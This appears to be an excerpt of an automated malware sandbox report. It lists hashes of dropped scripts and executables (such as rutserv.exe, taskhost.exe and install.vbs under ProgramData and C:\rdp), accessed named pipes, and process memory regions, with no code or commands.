SHA16b65372f40da0ca9cd1c032a191db067d40ff2e3
SHA256534e0430f7e8883b352e7cba4fa666d2f574170915caa8601352d5285eee5432
SHA5125e4482a0dbe01356ef0cf106b5ee4953f0de63c24a91b5f217d11da852e3e68fc254fa47c589038883363b4d1ef3732d7371de6117ccbf33842cee63afd7f086
-
C:\rdp\install.vbsMD5
6d12ca172cdff9bcf34bab327dd2ab0d
SHA1d0a8ba4809eadca09e2ea8dd6b7ddb60e68cd493
SHA256f797d95ce7ada9619afecde3417d0f09c271c150d0b982eaf0e4a098efb4c5ec
SHA512b840afa0fe254a8bb7a11b4dd1d7da6808f8b279e3bed35f78edcb30979d95380cfbfc00c23a53bec83fe0b4e45dcba34180347d68d09d02347672142bf42342
-
C:\rdp\pause.batMD5
a47b870196f7f1864ef7aa5779c54042
SHA1dcb71b3e543cbd130a9ec47d4f847899d929b3d2
SHA25646565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba
SHA512b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60
-
C:\rdp\run.vbsMD5
6a5f5a48072a1adae96d2bd88848dcff
SHA1b381fa864db6c521cbf1133a68acf1db4baa7005
SHA256c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe
SHA512d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\ProgramData\Microsoft\Intel\R8.exeMD5
ad95d98c04a3c080df33ed75ad38870f
SHA1abbb43f7b7c86d7917d4582e47245a40ca3f33c0
SHA25640d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd
SHA512964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed
-
\ProgramData\Microsoft\Intel\taskhost.exeMD5
a70edb47d3e316ce552ae09766ecb952
SHA1eceff6722453fbed6190accaa9ecc3a74bdc7356
SHA256a1fedc5b5caaccde52420d8950b4ca3b17111da49abf07ca0fb33123521e8641
SHA512e16330a7e721329cce06f3b4546cd8ef9ca6307ecb747044f67811b9b4dc7ff59651e5eebc9025eb773c3061102e80b4bbed114db97adeb4c1b345ba05c8c4a5
-
\ProgramData\Microsoft\Intel\taskhost.exeMD5
a70edb47d3e316ce552ae09766ecb952
SHA1eceff6722453fbed6190accaa9ecc3a74bdc7356
SHA256a1fedc5b5caaccde52420d8950b4ca3b17111da49abf07ca0fb33123521e8641
SHA512e16330a7e721329cce06f3b4546cd8ef9ca6307ecb747044f67811b9b4dc7ff59651e5eebc9025eb773c3061102e80b4bbed114db97adeb4c1b345ba05c8c4a5
-
\ProgramData\Microsoft\Intel\taskhost.exeMD5
a70edb47d3e316ce552ae09766ecb952
SHA1eceff6722453fbed6190accaa9ecc3a74bdc7356
SHA256a1fedc5b5caaccde52420d8950b4ca3b17111da49abf07ca0fb33123521e8641
SHA512e16330a7e721329cce06f3b4546cd8ef9ca6307ecb747044f67811b9b4dc7ff59651e5eebc9025eb773c3061102e80b4bbed114db97adeb4c1b345ba05c8c4a5
-
\ProgramData\Microsoft\Intel\taskhost.exeMD5
a70edb47d3e316ce552ae09766ecb952
SHA1eceff6722453fbed6190accaa9ecc3a74bdc7356
SHA256a1fedc5b5caaccde52420d8950b4ca3b17111da49abf07ca0fb33123521e8641
SHA512e16330a7e721329cce06f3b4546cd8ef9ca6307ecb747044f67811b9b4dc7ff59651e5eebc9025eb773c3061102e80b4bbed114db97adeb4c1b345ba05c8c4a5
-
\ProgramData\Microsoft\Intel\wini.exeMD5
87b45cfb9f62dd793f0ac86b8b7940e5
SHA16245b453590748a48c4e6c29f391c2189ff657a2
SHA256df3cd1545ce80e880c687a4ae4dc0846c41aaa32115029c88b6297580a89ab17
SHA512332f4c66b5a4324aeccf3ee337ee34b2e764704e528b29657c4b6628565a5898c35b2c49cd2881090ac0b770537e6fe0a4516cb072b63fccca1c2a0fc948d196
-
\ProgramData\RealtekHD\taskhost.exeMD5
cd9f1b76be96fd43770b72805dd42c5c
SHA1c52ee36a84df91abaf42266046038c5cb24bafe8
SHA2565a6654ea85c37c375dbba3263f3b48f04143bdce67f91ab6604d172772c28f8e
SHA512f9482ef145d5a1e9711e053cfee1f60bac99f7de134bd6539cb2d2a5221c7da650e248e9efc1dd8874fb8b5134b7e462261848a715907418865667eec7e12cbc
-
\ProgramData\RealtekHD\taskhostw.exeMD5
e94f61a2467a198c6cc66a1f1e9cfb6e
SHA1767628fe9032e6295f3cf9085081e49e2334818d
SHA2560e47618cc1e6f4fe03b35aedf8bdaa8df7a6425a82aa075ec7c850fbdb8f6db2
SHA5128e5e812c3246fb682a3dc087daf437514bfbe96769e8b07aa7c5d70e1728cee3114746392e12b0b84aa5cc9c25edfaaff8377b151593cbd3267a9fc943154af3
-
\ProgramData\Windows\rfusclient.exeMD5
b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
\ProgramData\Windows\winit.exeMD5
705e63ba28d331a481a5e9833c67d426
SHA122ed4fd1fb0f2fd7e93d0517667c8876af5d004c
SHA256a55d1809ec80b41d510186eddd9bb4e787c9a1f1460418eaed2a61bfbfa5d1e7
SHA512dcc8d749dd632dfae7f2b63e075485a6bfde7d811bff0c10dd2f6b78e9b7b7a94926a0c558f0d4fb4c8cf04e74be9ccbfeddc533693dcddea879b2ca9d70bb3f
-
\ProgramData\Windows\winit.exeMD5
705e63ba28d331a481a5e9833c67d426
SHA122ed4fd1fb0f2fd7e93d0517667c8876af5d004c
SHA256a55d1809ec80b41d510186eddd9bb4e787c9a1f1460418eaed2a61bfbfa5d1e7
SHA512dcc8d749dd632dfae7f2b63e075485a6bfde7d811bff0c10dd2f6b78e9b7b7a94926a0c558f0d4fb4c8cf04e74be9ccbfeddc533693dcddea879b2ca9d70bb3f
-
\ProgramData\Windows\winit.exeMD5
705e63ba28d331a481a5e9833c67d426
SHA122ed4fd1fb0f2fd7e93d0517667c8876af5d004c
SHA256a55d1809ec80b41d510186eddd9bb4e787c9a1f1460418eaed2a61bfbfa5d1e7
SHA512dcc8d749dd632dfae7f2b63e075485a6bfde7d811bff0c10dd2f6b78e9b7b7a94926a0c558f0d4fb4c8cf04e74be9ccbfeddc533693dcddea879b2ca9d70bb3f
-
\ProgramData\Windows\winit.exeMD5
705e63ba28d331a481a5e9833c67d426
SHA122ed4fd1fb0f2fd7e93d0517667c8876af5d004c
SHA256a55d1809ec80b41d510186eddd9bb4e787c9a1f1460418eaed2a61bfbfa5d1e7
SHA512dcc8d749dd632dfae7f2b63e075485a6bfde7d811bff0c10dd2f6b78e9b7b7a94926a0c558f0d4fb4c8cf04e74be9ccbfeddc533693dcddea879b2ca9d70bb3f
-
\ProgramData\install\cheat.exeMD5
ba6db89c2fbba9d58d6b0b43b056bf27
SHA1500a5bf869139bacdb69a0a22b71bc1f86d0b507
SHA256ced1f4db662484f24cfec341f8a77b5b3e204da2931b6bafa38a80cda5559482
SHA5126e95dc04990ccf4825e8506654503f5c79b87e0a89ac51f90ad647e0e9cbf6dabed7488a0c74a879d456b1a3c17dcb7c878126064a11b9eecb08704d6abc1e5c
-
\rdp\Rar.exeMD5
2e86a9862257a0cf723ceef3868a1a12
SHA1a4324281823f0800132bf13f5ad3860e6b5532c6
SHA2562356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8
SHA5123a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de
-
memory/240-97-0x0000000000230000-0x0000000000231000-memory.dmpFilesize
4KB
-
memory/292-81-0x0000000000000000-mapping.dmp
-
memory/304-74-0x0000000000000000-mapping.dmp
-
memory/304-117-0x0000000000000000-mapping.dmp
-
memory/304-96-0x0000000000230000-0x0000000000231000-memory.dmpFilesize
4KB
-
memory/332-39-0x0000000000000000-mapping.dmp
-
memory/368-193-0x0000000000460000-0x0000000000480000-memory.dmpFilesize
128KB
-
memory/368-192-0x000000013F910000-0x000000013FEB0000-memory.dmpFilesize
5.6MB
-
memory/368-191-0x00000000000F0000-0x0000000000104000-memory.dmpFilesize
80KB
-
memory/560-32-0x0000000000000000-mapping.dmp
-
memory/568-9-0x0000000000000000-mapping.dmp
-
memory/568-23-0x0000000002570000-0x0000000002574000-memory.dmpFilesize
16KB
-
memory/676-69-0x0000000000000000-mapping.dmp
-
memory/736-113-0x0000000000000000-mapping.dmp
-
memory/744-82-0x0000000000000000-mapping.dmp
-
memory/800-105-0x0000000000000000-mapping.dmp
-
memory/800-118-0x0000000000000000-mapping.dmp
-
memory/824-57-0x0000000000000000-mapping.dmp
-
memory/824-109-0x0000000000000000-mapping.dmp
-
memory/860-103-0x0000000000000000-mapping.dmp
-
memory/860-63-0x0000000000000000-mapping.dmp
-
memory/912-71-0x0000000000000000-mapping.dmp
-
memory/952-24-0x0000000000000000-mapping.dmp
-
memory/964-22-0x0000000000000000-mapping.dmp
-
memory/1008-34-0x0000000000000000-mapping.dmp
-
memory/1028-70-0x0000000000000000-mapping.dmp
-
memory/1040-92-0x0000000000000000-mapping.dmp
-
memory/1040-112-0x0000000000230000-0x0000000000231000-memory.dmpFilesize
4KB
-
memory/1048-38-0x0000000000000000-mapping.dmp
-
memory/1052-101-0x0000000000000000-mapping.dmp
-
memory/1052-30-0x0000000000000000-mapping.dmp
-
memory/1052-116-0x0000000000000000-mapping.dmp
-
memory/1136-136-0x000007FEFC1D1000-0x000007FEFC1D3000-memory.dmpFilesize
8KB
-
memory/1136-115-0x0000000000000000-mapping.dmp
-
memory/1156-100-0x0000000000000000-mapping.dmp
-
memory/1156-68-0x00000000002B0000-0x00000000002B1000-memory.dmpFilesize
4KB
-
memory/1156-58-0x00000000037D0000-0x00000000037E1000-memory.dmpFilesize
68KB
-
memory/1156-43-0x0000000000000000-mapping.dmp
-
memory/1156-61-0x00000000037D0000-0x00000000037E1000-memory.dmpFilesize
68KB
-
memory/1156-59-0x0000000003BE0000-0x0000000003BF1000-memory.dmpFilesize
68KB
-
memory/1244-88-0x0000000000000000-mapping.dmp
-
memory/1336-78-0x0000000000000000-mapping.dmp
-
memory/1340-67-0x0000000000000000-mapping.dmp
-
memory/1340-86-0x0000000000000000-mapping.dmp
-
memory/1340-37-0x0000000000000000-mapping.dmp
-
memory/1344-27-0x0000000000000000-mapping.dmp
-
memory/1360-185-0x0000000002770000-0x0000000002774000-memory.dmpFilesize
16KB
-
memory/1376-104-0x0000000000000000-mapping.dmp
-
memory/1440-17-0x0000000002220000-0x0000000002221000-memory.dmpFilesize
4KB
-
memory/1440-5-0x0000000000000000-mapping.dmp
-
memory/1488-107-0x0000000000000000-mapping.dmp
-
memory/1504-51-0x0000000000000000-mapping.dmp
-
memory/1504-93-0x0000000000000000-mapping.dmp
-
memory/1516-3-0x0000000000000000-mapping.dmp
-
memory/1552-110-0x0000000000000000-mapping.dmp
-
memory/1556-77-0x0000000000000000-mapping.dmp
-
memory/1568-50-0x0000000000000000-mapping.dmp
-
memory/1576-40-0x0000000000000000-mapping.dmp
-
memory/1592-102-0x0000000000000000-mapping.dmp
-
memory/1596-72-0x0000000000000000-mapping.dmp
-
memory/1608-60-0x0000000000000000-mapping.dmp
-
memory/1624-55-0x0000000000000000-mapping.dmp
-
memory/1700-15-0x0000000000000000-mapping.dmp
-
memory/1708-145-0x00000000001C0000-0x00000000001C1000-memory.dmpFilesize
4KB
-
memory/1708-111-0x0000000000000000-mapping.dmp
-
memory/1708-56-0x0000000000000000-mapping.dmp
-
memory/1712-91-0x0000000000000000-mapping.dmp
-
memory/1712-106-0x0000000003940000-0x0000000003951000-memory.dmpFilesize
68KB
-
memory/1712-114-0x0000000000230000-0x0000000000231000-memory.dmpFilesize
4KB
-
memory/1712-108-0x0000000003D50000-0x0000000003D61000-memory.dmpFilesize
68KB
-
memory/1812-83-0x0000000000000000-mapping.dmp
-
memory/1836-89-0x0000000000000000-mapping.dmp
-
memory/1856-2-0x00000000767E1000-0x00000000767E3000-memory.dmpFilesize
8KB
-
memory/1960-73-0x0000000000230000-0x0000000000231000-memory.dmpFilesize
4KB
-
memory/1960-64-0x0000000000000000-mapping.dmp
-
memory/2108-125-0x0000000000000000-mapping.dmp
-
memory/2116-123-0x0000000000000000-mapping.dmp
-
memory/2148-146-0x00000000023B0000-0x00000000023B1000-memory.dmpFilesize
4KB
-
memory/2172-126-0x0000000000000000-mapping.dmp
-
memory/2204-127-0x0000000000000000-mapping.dmp
-
memory/2240-129-0x0000000000000000-mapping.dmp
-
memory/2248-176-0x000007FEF67C0000-0x000007FEF6A3A000-memory.dmpFilesize
2.5MB
-
memory/2268-130-0x0000000000000000-mapping.dmp
-
memory/2292-151-0x0000000002640000-0x0000000002644000-memory.dmpFilesize
16KB
-
memory/2296-131-0x0000000000000000-mapping.dmp
-
memory/2332-132-0x0000000000000000-mapping.dmp
-
memory/2356-133-0x0000000000000000-mapping.dmp
-
memory/2416-167-0x00000000026F0000-0x00000000026F4000-memory.dmpFilesize
16KB
-
memory/2764-187-0x000000001E000000-0x000000001E29B000-memory.dmpFilesize
2.6MB
-
memory/2764-188-0x00000000001D0000-0x00000000001DE000-memory.dmpFilesize
56KB
-
memory/2764-189-0x0000000010000000-0x000000001015E000-memory.dmpFilesize
1.4MB
-
memory/2764-190-0x00000000026D0000-0x00000000027CE000-memory.dmpFilesize
1016KB
-
memory/3060-137-0x000007FEF67C0000-0x000007FEF6A3A000-memory.dmpFilesize
2.5MB